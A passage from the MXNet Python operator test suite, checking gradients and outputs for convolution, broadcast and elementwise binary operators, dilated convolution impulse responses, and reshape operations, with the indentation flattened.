arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
        # Generate random data with ndim between 1 and 5 and every shape dim between 1 and 5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
    d = gen_broadcast_data(idx)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
    d = gen_binary_data(dummy)
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
            logging.error('input b hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
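# Sketch: reduce_op above encodes the usual broadcasting rule that the gradient
# of a broadcast input is the output gradient summed over every broadcast axis.
# `_sketch_reduce_broadcast_grad` is an illustrative numpy-only restatement for
# same-ndim shapes, not invoked by the test suite.
def _sketch_reduce_broadcast_grad(g_out, in_shape):
    for axis, (gdim, idim) in enumerate(zip(g_out.shape, in_shape)):
        if gdim != idim:  # this axis was broadcast from size 1
            g_out = g_out.sum(axis=axis, keepdims=True)
    return g_out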
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
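# The float64 casts in test_bmod above exist because '%' amplifies rounding error:
# near a multiple of b, a float32 and a float64 evaluation of a % b can land on
# opposite sides of that multiple and differ by nearly b rather than by an ulp,
# so no reasonable rtol/atol covers the float32 case.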
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double precision, so to avoid numerical
# errors we have to use doubles as well. This was a flaky test when using
# float32: seeds 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation; hence the loose
# atol on the forward check below.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
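# A small numpy sketch (illustrative helper only) of why the backward pass
# of a broadcast binary op reduces gradients: the incoming gradient has the
# output (broadcast) shape, and every broadcast axis of an input receives
# the sum of the gradients of all output elements it fed.
def _demo_broadcast_grad_reduction():
    a = np.random.rand(3, 1, 5)                 # axis 1 is broadcast
    b = np.random.rand(3, 4, 5)
    g_out = np.random.rand(3, 4, 5)             # gradient w.r.t. (a + b)
    g_a = g_out.sum(axis=1, keepdims=True)      # reduce over the broadcast axis
    # numerically spot-check one element of a
    eps = 1e-6
    a2 = a.copy()
    a2[1, 0, 2] += eps
    num = (((a2 + b) * g_out).sum() - ((a + b) * g_out).sum()) / eps
    assert np.allclose(num, g_a[1, 0, 2], atol=1e-5)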
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple first-order check of the kernel gradient: nudging the
# kernel by its own gradient should change the center output by about
# np.sum(kernel_gradient), since the input is all ones.
assert(abs(out[center] - np.sum(kernel_gradient) - out_orig[center]) < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
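# A standalone 1-D numpy sketch (hypothetical helper, mirroring the tests
# above) of the impulse-response property being exercised: correlating a
# unit impulse with a kernel just stamps the kernel around the impulse, so
# the output sums to the sum of the kernel entries regardless of dilation
# (prod(kernel_shape) for an all-ones kernel).
def _demo_impulse_response_1d(ksize=3, dil=2, n=33):
    x = np.zeros(n)
    x[n // 2] = 1.0
    k = np.ones(ksize)
    span = dil * (ksize - 1) + 1                # receptive field of the dilated kernel
    out = np.zeros(n - span + 1)
    for i in range(out.size):                   # naive "valid" cross-correlation
        out[i] = sum(k[j] * x[i + j * dil] for j in range(ksize))
    assert np.isclose(out.sum(), k.sum())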
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
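# For reference, the special values accepted by Reshape's shape argument,
# as exercised by the cases above:
#    0  copy this dimension from the input
#   -1  infer this dimension from the remaining elements (used at most once)
#   -2  copy all remaining input dimensions
#   -3  merge the next two input dimensions into one
#   -4  split one input dimension into the two values that follow
# With reverse=True the matching runs from the right instead, e.g.
# (2, 3, 5, 5) with shape (0, -1) gives (2, 75) forward but (5, 30) reversed.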
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
